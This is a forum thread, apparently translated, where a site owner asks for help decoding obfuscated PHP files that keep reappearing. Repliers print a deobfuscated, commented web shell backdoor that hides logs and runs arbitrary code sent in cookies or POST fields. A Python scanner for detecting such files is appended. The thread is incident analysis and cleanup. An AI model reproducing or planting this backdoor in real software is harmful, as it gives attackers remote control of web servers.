Any options to decrypt this php?
Some virus on the site constantly creates 2 files and starts spamming wildly. Who creates them and how, I have been unable to establish. So I'm wondering whether deciphering them would help? Please suggest how, or with what, they can be brought into a readable form.
They are big, I couldn't post them here.
1st file.
hello-site.ru/share/Strannyj-kod
It didn't fit in there either; it ends like this:
'3DX13HmvKmDXuZB';
$djrxvctcq = Array('1'=>'D', '0'=>'1', '3'=>'Q', '2'=>'u', '5'=>'9', '4'=>'L', '7'=>'j', '6'=>'a', '9'=>'8', '8'=>'t', 'A'=>'f', 'C'=>'g', 'B'=>'7', 'E'=>'i', 'D'=>'0', 'G'=>'A', 'F'=>'n', 'I'=>'r', 'H'=>'p', 'K'=>'G', 'J'=>'b', 'M'=>'T', 'L'=>'2', 'O'=>'X', 'N'=>'v', 'Q'=>'m', 'P'=>'3', 'S'=>'J', 'R'=>'c', 'U'=>'E', 'T'=>'x', 'W'=>'o', 'V'=>'O', 'Y'=>'N', 'X'=>'K', 'Z'=>'k', 'a'=>'Y', 'c'=>'P', 'b'=>'w', 'e'=>'R', 'd'=>'d', 'g'=>'U', 'f'=>'Z', 'i'=>'W', 'h'=>'h', 'k'=>'6', 'j'=>'I', 'm'=>'l', 'l'=>'H', 'o'=>'V', 'n'=>'q', 'q'=>'B', 'p'=>'z', 's'=>'s', 'r'=>'5', 'u'=>'C', 't'=>'S', 'w'=>'M', 'v'=>'e', 'y'=>'F', 'x'=>'y', 'z'=>'4');
eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));?>
pastebin.com/uNfLxXCu
PS: the script is not complete, because you yourself supplied a broken source.
If, excuse me, someone is shitting in the stairwell, do you need a stool analysis (fine, we'll do it, "and you'll see it there"), or do you still need to install a combination lock?
Probably this is not a virus on the site but a bot that exploits a shell-type vulnerability; that is, there is no "propagation" as such in this code. But it originally came from somewhere, which means there is still a "hole", and if you haven't removed it yet, it hasn't disappeared by itself; it's still there and can be used...
And if it makes sense to analyze the code, then in addition to deobfuscation, debugging is always needed; without it, the analysis time grows exponentially with the size of the code and the encryption, so learn how to debug PHP.
I changed eval to echo and saw everything.
But how do I find what creates them?
Is it possible to see who created the file and how?
The first script accepts an encrypted command via $_COOKIE or $_POST and returns the result of its execution.
<?php
// Hide evidence: no error log file, no logged errors, no execution time limit.
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
$command = NULL;
$pass = NULL;
// Hard-coded shared secret; the same value must come back as $command['ak'].
// (The deobfuscated dump had "global $globalKey = ..." here, which is not valid
// PHP; at file scope a plain assignment is what was meant.)
$globalKey = 'cfa57343-5fb2-4c08-95bc-c0e9c5972f14';
// Repeating-key XOR; applying it twice with the same key restores the input.
function decode($str, $key)
{
    $result = "";
    for ($i = 0; $i < strlen($str);)
    {
        for ($j = 0; $j < strlen($key) && $i < strlen($str); $j++, $i++)
        {
            $result .= chr(ord($str[$i]) ^ ord($key[$j]));
        }
    }
    return $result;
}
// Two XOR layers: first the hard-coded key, then the per-request key.
function decode2($str, $key)
{
    global $globalKey;
    return decode(decode($str, $globalKey), $key);
}
// Any cookie (or, failing that, any POST field) is accepted: the field name is
// the second XOR key and the value is the payload, so there is no fixed
// parameter name to look for in the request.
foreach ($_COOKIE as $name => $value)
{
    $command = $value;
    $pass = $name;
}
if (!$command)
{
    foreach ($_POST as $name => $value)
    {
        $command = $value;
        $pass = $name;
    }
}
// base64 -> XOR -> XOR -> unserialize; a wrong key just yields garbage and false.
$command = @unserialize(decode2(base64_decode($command), $pass));
if (isset($command['ak']) && $globalKey == $command['ak'])
{
    if ($command['a'] == 'i')
    {
        // 'i' = identify: report the PHP version and the backdoor's own version.
        $versions = Array(
            'pv' => @phpversion(),
            'sv' => '1.0-1',
        );
        echo @serialize($versions);
    }
    elseif ($command['a'] == 'e')
    {
        // 'e' = execute arbitrary PHP code sent in $command['d'].
        eval($command['d']);
    }
    exit();
}
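Added example (not from the thread, and not the poster's code): a small Python scanner that looks for the traits the two files in this thread share, so the webroot can be checked for further copies. The regexes and the verdict thresholds are my own heuristics; the sample sources below are constructed abridgements of the two scripts above.

```python
import os
import re

# Each pattern is drawn from the two samples in the thread: the substitution-table
# loader ending in eval/*junk*/(...) and the decoded script that disables logging,
# harvests any cookie/POST field, base64-decodes it and feeds it to unserialize()/eval().
INDICATORS = {
    "eval_comment_call": re.compile(r"\beval\s*/\*[^*]*\*/\s*\("),
    "char_substitution_table": re.compile(
        r"Array\s*\((?:\s*'[^']'\s*=>\s*'[^']'\s*,){20,}"),
    "logging_disabled": re.compile(
        r"@?ini_set\s*\(\s*'(?:error_log|log_errors)'\s*,\s*(?:NULL|0)\s*\)"),
    "unserialize_of_base64": re.compile(
        r"unserialize\s*\(.*?base64_decode\s*\(", re.DOTALL),
    "superglobal_harvest": re.compile(
        r"foreach\s*\(\s*\$_(?:COOKIE|POST|GET)\s+as\s+\$\w+\s*=>\s*\$\w+"),
    "eval_of_array_element": re.compile(r"\beval\s*\(\s*\$\w+\s*\[[^\]]+\]\s*\)"),
}

def scan_source(src):
    """Names of the indicators that fire on one PHP source, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))

def verdict(hits):
    """Two independent indicators is a strong signal; one is worth a look."""
    return "backdoor-like" if len(hits) >= 2 else "suspicious" if hits else "clean"

def scan_tree(root):
    """{path: (verdict, hits)} for every .php file under root that fires."""
    report = {}
    for d, _, files in os.walk(root):
        for f in (f for f in files if f.lower().endswith(".php")):
            path = os.path.join(d, f)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                report[path] = (verdict(hits), hits)
    return report

# Constructed samples abridged from the thread; the 26-entry table is a made-up
# alphabet reversal, not the real one, and the hard-coded key is omitted.
_TABLE = ", ".join("'%s'=>'%s'" % p for p in zip(
    "abcdefghijklmnopqrstuvwxyz", "zyxwvutsrqponmlkjihgfedcba"))
SAMPLE_LOADER = ("<?php\n$czbetc = 'Q3DX13HmvKmDXuZB';\n$djrxvctcq = Array(%s);\n"
                 "eval/*txilqla*/(omspplru($czbetc, $djrxvctcq));?>\n" % _TABLE)
SAMPLE_BACKDOOR = ("<?php\n@ini_set('error_log', NULL);\n@ini_set('log_errors', 0);\n"
                   "foreach ($_COOKIE as $name => $value) { $command = $value; $pass = $name; }\n"
                   "$command = @unserialize(decode2(base64_decode($command), $pass));\n"
                   "if ($command['a'] == 'e') { eval($command['d']); }\n")
SAMPLE_CLEAN = ("<?php\n$rows = json_decode(file_get_contents('data.json'), true);\n"
                "foreach ($rows as $id => $row) { echo htmlspecialchars($row['name']); }\n")
```

Run scan_tree() against the webroot; a hit on a file you did not deploy is the file to pull out, and the access log entries for that path show which requests were driving it.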